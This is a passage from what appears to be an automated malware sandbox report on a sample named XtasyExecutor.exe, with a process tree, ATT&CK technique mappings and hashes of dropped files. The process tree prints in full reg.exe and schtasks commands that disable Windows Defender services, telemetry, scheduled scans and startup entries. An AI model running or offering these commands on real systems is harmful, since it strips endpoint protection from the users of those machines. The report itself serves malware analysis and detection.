C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:2412
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:5184
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:5200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:5212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:5228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:5280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:3684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:3208
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:1276
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2824
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1144
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3652
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:5480
-
-
-
-
C:\Users\Admin\Downloads\XtasyExecutor.exe"C:\Users\Admin\Downloads\XtasyExecutor.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:12⤵PID:5492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:12⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:5656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:12⤵PID:5664
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:856
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3980
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2832
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1628
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b03d78ec6b6f6bfc8ce2f6e81cd88647
SHA1014cb7dc4aa1bc5d2cb4ec25ec58470baf5b6741
SHA256983928a84fcf0791614cc3d17d92d62ffbed0bf0f141d7544d0cc762977a3905
SHA5124699916bdfa5776d72ad2643fad072a7a19783900608290bd1246a19624d61b58a1d80eceb74215b7198aaf04c526fa8703d38f3c5fdcc1add19b87508685ce0
-
Filesize
152B
MD595ba0df0c4c417ae5a52c277e5f43b64
SHA17c3bf3447551678f742cc311cd4cf7b2a99ab3be
SHA256fdaa82c65558793b81117a66acd5645d4072f6b71f164ed2717a17cab6e727ea
SHA512fcb35a1949664f218ae40c25fd6eaefc4ba6417034a522f0800c50ee78e530c33080faa73ff9ea82f35749d404d6b9c94fc7e8e224689503e699a5ec2b0d5abb
-
Filesize
202KB
MD520bd0480bb862bd1d073477a87aede81
SHA13c7c72fc3c1bec023386ac6ed14ad5cb785fe4ce
SHA256548529c38438f4a9aea915448e183f24d4ddbe793a86090075775a154d59f067
SHA5126b4817a7921bb62bbaf6835a3948a1811914f652f5f6ad86fe0b52376b6347d180488c3de4f02ba8ec962c45c5b4d6ad91eba11441989bbb42dab2863dfaa766
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD569f4bb4fb4c2d5ce571658e9b3b681c3
SHA13043c3018280f1e7cfa1d86134acf7f895524738
SHA2569b3a045c6b49d10c7e730cd1809fa16487aee6b52fcb1d26214ed1e5cde22bb5
SHA5129b34a54d936d1bc7c4c318cf761f3431502bca4e4d4f1508e646733ef6bdd8ed0020b5982f8e2942a1b85cd35fd0b5dcf52c53aae6af3a950395ea84c756eedc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize48B
MD51611bae06752be83c746a0537ed88799
SHA14b3b1da3f0f0ab2817c4b21c58e6c93f9992aa69
SHA2569f6ddd7cb1c05c78892b142db735974b958bcaad1f5dd15d1ed537c362ab73ab
SHA512ce67ac4092f0aef08bc0c91b7baa6178582d6b2a916a0e5ef2b394df9434f6c404939656b3d7073965c015b7711238185671515c31f52e90500c9af4fc5d2338
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
6KB
MD552a695056ed2f427bc0abfae6db3b0c8
SHA1b024c3c365b254d416bc2f539b3351d09f7f2c91
SHA2560345b4e93511fc7107f25c1860f49ddaa28673fffa9e6a7e0b10c001699bac00
SHA5123a0d1d5970f4311e0ee9bb7ae16683e2f217d82de1dd46932bdcd226a27182695ac4b9e88c62a6708cf57bd526bc1d2aa38b05a07e98e653e0a15218ff3938c2
-
Filesize
6KB
MD57e2566993e53c06e2113e3bf5b071901
SHA1883af64164af3effdfc220a9fcafdc078e32bae1
SHA256206de180b73bf97b3cc1b5250fb9cd4b23087fc2fde58ce06ed5dba21bc9d6d3
SHA5123a47a47eef1b49e7000c44c1d28e7272a8daf129c941c08473609de99a8b04f3a4da731b59c893a19058914951e5a7b81109c76c8bfdfa87d1e7a6d9db167918
-
Filesize
5KB
MD5002e809e6be8465f85916a79a829b7ca
SHA1e54683269ffd65a4ec98f8549d1f6f6f05a628a4
SHA2564aae3616e6e66e94620e84938e17c0351af8b41db8122798470c8f09d3ee55ea
SHA512aee07c5137a90199b8bffb8e32adea9e4d1d5fb4e6ed562c55a4ab6e3000495f718bf777848c8fabdc87166e675e92efee40c454233c8985906d1fa53469cd6d
-
Filesize
24KB
MD50493f44576fd7d9b6216b7387a26543e
SHA147d35c7f2990ec4668ecf1c01e0e5f623153a3f3
SHA2560679b6900e2118e17164159f449fdc1f6bf20c0cc0b056cc9aedfae42a830ca8
SHA512a519962ffb281d471bcf63c0bf75bed19d4eeac591cf6bf8565af14dde1d57fe8cabfc05bec52b2087ce8c6f637dbefb438ce22054895dc116b31bffa18e9cd3
-
Filesize
24KB
MD51cc3bc2b1c52831cc0b972d856888e8c
SHA19ffa8cf55aa29f6cbdd5ec39b1b33938b29e9990
SHA256a8f894b23c518e04d94f1bb51343443de8121366171d2f05441283dbb1cfdd2c
SHA51285bd6789da57c911f9cc35929ab302829614a4f03b3de30e28ab16558279ed02200a7db802c9bcd6b2e5886ea3c323d6a39eb8c3ee309d8b5702be65dab7c3dd
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD5c918f59fb89f05a7a4af633f6bb552c1
SHA1145dbf29f6eeb7306debde0a8e1eb4e9fd021963
SHA256ee44f49ca1bc3c424d0499ac4d530bb8d82070d85973dbdb12daa3cc447d0a79
SHA512fa3a805178790cd9f44f1617c175030bd2b57073ff1623a54e20dd3e9824499d3ee79243aeabf2ffabe366169d24e737598936bad18d024bba03467341c794eb
-
Filesize
9KB
MD5d40bdb7c5564b26f40342f3940401ab4
SHA195f58fc2623be3d2714c8c2344055849f2b14068
SHA2568667911d30a932ef73b9e0c8c41dd915e24b12e2ae7c706e6f9faf62811f3315
SHA512221aa21892ef95fff19a4af25fccf9000a263e61136b685a93211b8e1f0b677a7701030db4390333a993bddd651785a0e7c223298c75e4dcc45e10925406e9d6
-
Filesize
3KB
MD510e9d7377b7fd4df43145ae4c8b136b3
SHA14002ba143ff336f631d36c6afd93464822ba541e
SHA2561b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1
SHA512c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD558fd924c8618818702b568b23b0e358f
SHA19c39b1ad812f6c047d37de188bc7829a64284e12
SHA2560e9d5e49378a0a2b3502132b5f690c9a42612f4fa03666f710d7f95411d6cc69
SHA51296fe411742010bdbd195897ff846f55ee5c845d802807ba81e08ee5384676ed66c93899362d4bd53e4fec13c5b77a4a144130533f54f621fdf55514308d5d58c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5713c2c6fbda30f62a07a5a6dcaecc000
SHA1df39a0d4348b61670333bb4361dc887e0d80fd83
SHA25614ef995a367f5ba0bba8481f3d83a7f1bfa83c3d5e42b2f29d18bbb58f8dfa3b
SHA5128b5ab05f921f29cb9222a03a15b8793fb26dc50d0c4b60f3679a1fa0f9dabeded89af4f0d48b86648aa6fb23bae18c4b544b7a6f528cd335bdd582b361a09183